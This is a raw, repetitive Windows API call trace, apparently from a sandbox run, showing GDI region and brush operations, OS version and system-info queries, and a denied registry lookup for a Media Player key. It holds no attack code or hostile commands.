0x1040c34 [0087.818] CombineRgn (hrgnDst=0x1040c33, hrgnSrc1=0xef0401d0, hrgnSrc2=0xf10401cd, iMode=1) returned 1 [0087.818] CombineRgn (hrgnDst=0x1040c34, hrgnSrc1=0xef0401d0, hrgnSrc2=0xf10401cd, iMode=4) returned 2 [0087.818] CreateSolidBrush (color=0xff) returned 0x2100c32 [0087.818] CreateSolidBrush (color=0xff0000) returned 0x1100c35 [0087.818] DeleteObject (ho=0x1100c35) returned 1 [0087.818] DeleteObject (ho=0xf10401cd) returned 1 [0087.818] DeleteObject (ho=0xef0401d0) returned 1 [0087.819] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.819] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.819] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.819] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.819] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.819] BeginPath (hdc=0x0) returned 0 [0087.819] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.819] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.819] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.819] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.819] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.819] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.819] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.819] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf20401cd [0087.819] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf00401d0 [0087.819] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c36 [0087.819] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c37 [0087.819] CombineRgn (hrgnDst=0x1040c36, hrgnSrc1=0xf20401cd, hrgnSrc2=0xf00401d0, iMode=1) returned 1 [0087.819] CombineRgn (hrgnDst=0x1040c37, hrgnSrc1=0xf20401cd, hrgnSrc2=0xf00401d0, iMode=4) returned 2 [0087.819] CreateSolidBrush (color=0xff) returned 0x2100c35 [0087.819] CreateSolidBrush (color=0xff0000) returned 0x1100c38 [0087.819] DeleteObject (ho=0x1100c38) returned 1 [0087.819] DeleteObject (ho=0xf00401d0) returned 1 [0087.819] DeleteObject (ho=0xf20401cd) returned 1 [0087.819] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.819] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.819] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.819] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.819] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.819] BeginPath (hdc=0x0) returned 0 [0087.819] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.819] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.819] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.819] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.819] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.819] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.819] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.820] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf10401d0 [0087.820] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf30401cd [0087.820] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c39 [0087.820] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3a [0087.820] CombineRgn (hrgnDst=0x1040c39, hrgnSrc1=0xf10401d0, hrgnSrc2=0xf30401cd, iMode=1) returned 1 [0087.820] CombineRgn (hrgnDst=0x1040c3a, hrgnSrc1=0xf10401d0, hrgnSrc2=0xf30401cd, iMode=4) returned 2 [0087.820] CreateSolidBrush (color=0xff) returned 0x2100c38 [0087.820] CreateSolidBrush (color=0xff0000) returned 0x1100c3b [0087.820] DeleteObject (ho=0x1100c3b) returned 1 [0087.820] DeleteObject (ho=0xf30401cd) returned 1 [0087.820] DeleteObject (ho=0xf10401d0) returned 1 [0087.820] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.820] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.820] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.820] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.820] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.820] BeginPath (hdc=0x0) returned 0 [0087.820] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.820] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.820] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.820] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.820] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.820] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.820] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.820] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.820] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf40401cd [0087.820] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf20401d0 [0087.820] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3c [0087.820] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3d [0087.820] CombineRgn (hrgnDst=0x1040c3c, hrgnSrc1=0xf40401cd, hrgnSrc2=0xf20401d0, iMode=1) returned 1 [0087.820] CombineRgn (hrgnDst=0x1040c3d, hrgnSrc1=0xf40401cd, hrgnSrc2=0xf20401d0, iMode=4) returned 2 [0087.820] CreateSolidBrush (color=0xff) returned 0x2100c3b [0087.820] CreateSolidBrush (color=0xff0000) returned 0x1100c3e [0087.820] DeleteObject (ho=0x1100c3e) returned 1 [0087.820] DeleteObject (ho=0xf20401d0) returned 1 [0087.820] DeleteObject (ho=0xf40401cd) returned 1 [0087.820] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.820] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.821] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.821] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.821] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.821] BeginPath (hdc=0x0) returned 0 [0087.821] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.821] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.821] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.821] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.821] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.821] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.821] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.821] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.821] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf30401d0 [0087.821] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf50401cd [0087.821] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3f [0087.821] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c40 [0087.821] CombineRgn (hrgnDst=0x1040c3f, hrgnSrc1=0xf30401d0, hrgnSrc2=0xf50401cd, iMode=1) returned 1 [0087.821] CombineRgn (hrgnDst=0x1040c40, hrgnSrc1=0xf30401d0, hrgnSrc2=0xf50401cd, iMode=4) returned 2 [0087.821] CreateSolidBrush (color=0xff) returned 0x2100c3e [0087.821] CreateSolidBrush (color=0xff0000) returned 0x1100c41 [0087.821] DeleteObject (ho=0x1100c41) returned 1 [0087.821] DeleteObject (ho=0xf50401cd) returned 1 [0087.821] DeleteObject (ho=0xf30401d0) returned 1 [0087.821] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.821] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.821] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.821] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.821] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.821] BeginPath (hdc=0x0) returned 0 [0087.821] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.821] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.821] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.821] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.821] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.821] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.821] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.821] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.822] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf60401cd [0087.822] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf40401d0 [0087.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c42 [0087.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c43 [0087.822] CombineRgn (hrgnDst=0x1040c42, hrgnSrc1=0xf60401cd, hrgnSrc2=0xf40401d0, iMode=1) returned 1 [0087.822] CombineRgn (hrgnDst=0x1040c43, hrgnSrc1=0xf60401cd, hrgnSrc2=0xf40401d0, iMode=4) returned 2 [0087.822] CreateSolidBrush (color=0xff) returned 0x2100c41 [0087.822] CreateSolidBrush (color=0xff0000) returned 0x1100c44 [0087.822] DeleteObject (ho=0x1100c44) returned 1 [0087.822] DeleteObject (ho=0xf40401d0) returned 1 [0087.822] DeleteObject (ho=0xf60401cd) returned 1 [0087.822] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.822] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.822] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.822] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.822] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.822] BeginPath (hdc=0x0) returned 0 [0087.822] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.822] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.822] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.822] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.822] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.822] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.822] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.822] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf50401d0 [0087.822] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf70401cd [0087.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c45 [0087.822] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c46 [0087.822] CombineRgn (hrgnDst=0x1040c45, hrgnSrc1=0xf50401d0, hrgnSrc2=0xf70401cd, iMode=1) returned 1 [0087.822] CombineRgn (hrgnDst=0x1040c46, hrgnSrc1=0xf50401d0, hrgnSrc2=0xf70401cd, iMode=4) returned 2 [0087.822] CreateSolidBrush (color=0xff) returned 0x2100c44 [0087.822] CreateSolidBrush (color=0xff0000) returned 0x1100c47 [0087.822] DeleteObject (ho=0x1100c47) returned 1 [0087.822] DeleteObject (ho=0xf70401cd) returned 1 [0087.822] DeleteObject (ho=0xf50401d0) returned 1 [0087.822] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.822] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.822] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.822] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.822] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.822] BeginPath (hdc=0x0) returned 0 [0087.822] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.823] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.823] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.823] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.823] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.823] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.823] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.823] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.823] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf80401cd [0087.823] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf60401d0 [0087.823] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c48 [0087.823] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c49 [0087.823] CombineRgn (hrgnDst=0x1040c48, hrgnSrc1=0xf80401cd, hrgnSrc2=0xf60401d0, iMode=1) returned 1 [0087.823] CombineRgn (hrgnDst=0x1040c49, hrgnSrc1=0xf80401cd, hrgnSrc2=0xf60401d0, iMode=4) returned 2 [0087.823] CreateSolidBrush (color=0xff) returned 0x2100c47 [0087.823] CreateSolidBrush (color=0xff0000) returned 0x1100c4a [0087.823] DeleteObject (ho=0x1100c4a) returned 1 [0087.823] DeleteObject (ho=0xf60401d0) returned 1 [0087.823] DeleteObject (ho=0xf80401cd) returned 1 [0087.823] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.823] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.823] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.823] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.823] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.823] BeginPath (hdc=0x0) returned 0 [0087.823] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.823] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.823] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.823] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.823] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.823] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.823] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.823] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.823] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf70401d0 [0087.823] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf90401cd [0087.823] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4b [0087.823] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4c [0087.823] CombineRgn (hrgnDst=0x1040c4b, hrgnSrc1=0xf70401d0, hrgnSrc2=0xf90401cd, iMode=1) returned 1 [0087.824] CombineRgn (hrgnDst=0x1040c4c, hrgnSrc1=0xf70401d0, hrgnSrc2=0xf90401cd, iMode=4) returned 2 [0087.824] CreateSolidBrush (color=0xff) returned 0x2100c4a [0087.824] CreateSolidBrush (color=0xff0000) returned 0x1100c4d [0087.824] DeleteObject (ho=0x1100c4d) returned 1 [0087.824] DeleteObject (ho=0xf90401cd) returned 1 [0087.824] DeleteObject (ho=0xf70401d0) returned 1 [0087.824] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.824] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.824] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.824] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.824] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.824] BeginPath (hdc=0x0) returned 0 [0087.824] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.824] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.824] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.824] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.824] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.824] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.824] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.824] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.824] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfa0401cd [0087.824] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf80401d0 [0087.824] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4e [0087.824] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c4f [0087.824] CombineRgn (hrgnDst=0x1040c4e, hrgnSrc1=0xfa0401cd, hrgnSrc2=0xf80401d0, iMode=1) returned 1 [0087.824] CombineRgn (hrgnDst=0x1040c4f, hrgnSrc1=0xfa0401cd, hrgnSrc2=0xf80401d0, iMode=4) returned 2 [0087.824] CreateSolidBrush (color=0xff) returned 0x2100c4d [0087.824] CreateSolidBrush (color=0xff0000) returned 0x1100c50 [0087.824] DeleteObject (ho=0x1100c50) returned 1 [0087.824] DeleteObject (ho=0xf80401d0) returned 1 [0087.824] DeleteObject (ho=0xfa0401cd) returned 1 [0087.824] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.824] 